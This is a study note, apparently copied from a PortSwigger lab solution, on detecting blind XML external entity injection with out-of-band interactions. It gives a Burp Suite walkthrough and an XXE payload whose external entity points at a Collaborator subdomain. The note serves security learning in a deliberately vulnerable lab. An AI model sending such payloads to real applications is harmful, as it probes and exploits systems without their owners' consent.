TheWhiteFluid/Obsidian_Cyber/Obisdian_vault/WEB.PortSwigger/XEE (XML external entity injection).md

 You can detect the [blind XXE](https://portswigger.net/web-security/xxe/blind) vulnerability by triggering out-of-band interactions with an external domain.
 To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

+1. Visit a product page, click "Check stock" and intercept the resulting POST request in [Burp Suite Professional](https://portswigger.net/burp/pro).
+2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element.
+Right-click and select "Insert Collaborator payload" to insert a Burp Collaborator subdomain where indicated:
+    `<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]>`
+3. Replace the `productId` number with a reference to the external entity:
+    `&xxe;`
+4. Go to the Collaborator tab, and click "Poll now".
+If you don't see any interactions listed, wait a few seconds and try again.
+You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.

 Analysis:

 - testing for XXE vulnerability (using internal XXE)